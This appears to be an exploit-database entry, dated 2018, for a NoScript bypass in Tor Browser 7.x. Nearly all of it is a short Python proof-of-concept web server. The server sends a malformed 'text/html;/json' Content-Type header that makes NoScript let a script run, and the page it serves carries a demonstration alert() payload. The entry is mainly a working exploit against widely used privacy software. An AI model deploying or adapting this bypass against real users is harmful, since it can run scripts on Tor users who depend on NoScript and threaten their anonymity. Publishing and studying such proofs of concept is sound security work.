Tor Browser 7.x NoScript Bypass



EKU-ID: 7946 CVE: OSVDB-ID:
Author: x0rz Published: 2018-09-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer

PORT_NUMBER = 31337

class myHandler(BaseHTTPRequestHandler):

        #Handler for the GET requests
        def do_GET(self):
                self.send_response(200)
                self.send_header('Content-type','text/html;/json') # Here is where the magic happens
                self.end_headers()
                self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
                return

try:
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print 'Started httpserver on port ' , PORT_NUMBER
        server.serve_forever()

except KeyboardInterrupt:
        print '^C received, shutting down the web server'
        server.socket.close()